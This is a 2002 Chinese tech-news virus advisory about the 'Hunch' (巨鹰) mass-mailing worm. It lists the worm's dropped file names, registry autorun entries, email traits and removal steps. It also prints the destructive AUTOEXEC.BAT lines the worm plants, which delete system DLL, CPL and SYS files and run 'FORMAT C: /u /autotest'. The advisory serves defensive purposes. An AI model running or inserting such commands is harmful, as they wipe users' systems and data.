中华网通行证
用户名 密码
中华网科技
科技动态 硬件广场 下载基地 网络教室 科学博览 移动时代 网吧之家 桌面壁纸 科技商情  

删除系统破坏硬盘文档 巨鹰蠕虫病毒乍现网络
千龙科技   2002-08-30 11:42:54

  
  千龙新闻网讯 近日,江民公司反病毒监测中心发现一名为"巨鹰"的蠕虫病毒,正在网上大面积传播扩散,该病毒具有极强的破坏性,它会在系统启动或者运行它的时候发作,被该蠕虫破坏的症状有删除Windows、Program Files、My Documents目录以及子目录下的文件、格式化磁盘,需要MSVBVM60.DLL文件才能执行,运行时显示一张巨鹰的图片(如图所示):

  该病毒别名:HUNCH.A, W32.Hunch@mm,大小:压缩后24,576 Bytes(用upx压缩),不压缩151,552 Bytes。有效系统:WINDOWS。语言:使 用VB编写,具有加密特性。

   该蠕虫可能会把自己拷贝几份留在系统目录下面,文件名可能是:

  CORA.EXE
  SALSA.EXE
  MSWORD.EXE
  LOCAS.EXE
  LORY.EXE
  DEJAS.EXE
  SEXO.EXE

   发作时至少删除和以下扩展名相同的五个文件:
  XLS
  DOC
  WAV
  ASM
  MPG
  BAT
  CDX
  JPG
  HTM
  HLP
  CHM
  RPG
  GIF
  SCR
  TTF
  MID
  MDB
  DBF
  ICO

  用软盘的时候,蠕虫可能会用它自身的拷贝代替软盘上的文件。
  该蠕虫会修改注册表,被感染的windows系统的注册表被修改可能有以下三种情况:

  1:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
  SALSA = "%SYSTEM%SALSA.EXE"
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
  SALSA = "%SYSTEM%SALSA.EXE"
  2:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
  DEJAS="C:WINDOWSSYSTEMDEJAS.EXE"
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
  DEJAS="C:WINDOWSSYSTEMDEJAS.EXE"
  3:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
  LOCAS="C:WINDOWSSYSTEMLOCAS.EXE"
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
  LOCAS="C:WINDOWSSYSTEMLOCAS.EXE"

  把下面三段命令中的任一段加到C:AUTOEXEC.BAT,在系统启动时删除重要文件并且自动格式化C盘:
  1.@echo off
  DEL %System%*.CPL
  DEL %System%*.DLL
  DEL %System%*.OCX
  CLS
  FORMAT C: /u /v:SALSA /autotest

  2.@echo off
  DEL %System%*.SYS
  DEL %System%*.LOG
  DEL %System%*.OCX
  CLS
  FORMAT C: /u /v:DEJAS /autotest
  3.@echo off
  DEL %System%*.CPL
  DEL %System%*.DLL
  DEL %System%*.DRV
  CLS
  FORMAT C: /u /v:LOCAS /autotest

  已经被感染的系统,正在运行的进程列表中会存在dejas,locas,salsa这三个进程。而且蠕虫会通过MAPI把自身发送给MS Outlook地址薄中的所有联系人。

  该邮件的特征:
  主题:空
  正文:Mensaje importante para <收件人> en el archivo adjunto
  附件:蠕虫自身的拷贝

  清除步骤:

  1. 从内存中终止正在运行的蠕虫进程
  按CTR+ALT+DEL打开WINDOWS的任务管理器,从进程列表选择dejas,locas,salsa,然后单击[结束进程]。

  2. 删除注册表中自动运行的入口打开注册表删除HKEY_LOCAL_MACHINE>Software>Microsoft>Windows> CurrentVersion>Run和HKEY_LOCAL_MACHINE>Software>Microsoft>Windows> CurrentVersion>RunServices中的DEJAS,LOCAS,SALSA三项。

  3. 修改AUTOEXECUTE.BAT文件
  打开文件删除带有@echo off , DEL ,CLS和FORMAT C:的行。

  4. 删除LISTWIN.TXT和WINLIST.TXT两个文件,这两个文件记录了被蠕虫删除的文件列表,存放在系统目录里边,如果是WIN9X/ME目录为C:WindowsSystem,如果是WIN NT/2000/XP目录为C:WindowsSystem32。

  5. 运行KV3000杀毒王进行系统扫描,把发现有WORM_HUNCH.A.的文件删除。
  

千龙新闻网


相关报道
 
更多本栏目内容
11名华人科学家致信政府 质疑“大科学”项目 (2004-08-10 10:05:47)
上市前怕遭专利官司 Google忍痛割股给Yahoo (2004-08-10 09:41:48)
面对微软SP2补丁包 IBM警告用户不要安装 (2004-08-10 09:48:25)
英语是印度在IT外包市场战胜中国的法宝 (2004-08-10 09:59:52)
Google曝IPO幕后细节 额外有2.6亿股待出售 (2004-08-08 11:48:07)
电脑不要保持待机状态 每小时消耗电量惊人 (2004-08-10 14:01:38)
软件商加强反盗版意识 反盗市场前景广阔 (2004-08-09 17:44:35)
双模小灵通北京偷卖? 信产部声言决不放行 (2004-08-10 09:31:45)
观察:Wintel衰亡史 微软和英特尔陷入泥潭 (2004-08-10 10:37:12)




本站检索


分类信息特别推荐

·国家级治脑病新药思维源
·中藏药治疗脑病新突破
·治类风湿,强直性脊柱炎
·养肾·痛风·长寿
·肝病泌尿脑萎缩新药介绍
·强直性脊柱炎康复乐园
·让中医辩证不孕不育
·国医治股骨头坏死一绝
·乙肝为何久治不愈?
·二千元垄断批发做老板
·中医中药专治前列腺
·治牛皮癣白癜风已成现实
·专治痛风病的白衣天使
·不孕不育的杏林奇葩
·专卖店零售管理系统



一元

   

科技频道主编信箱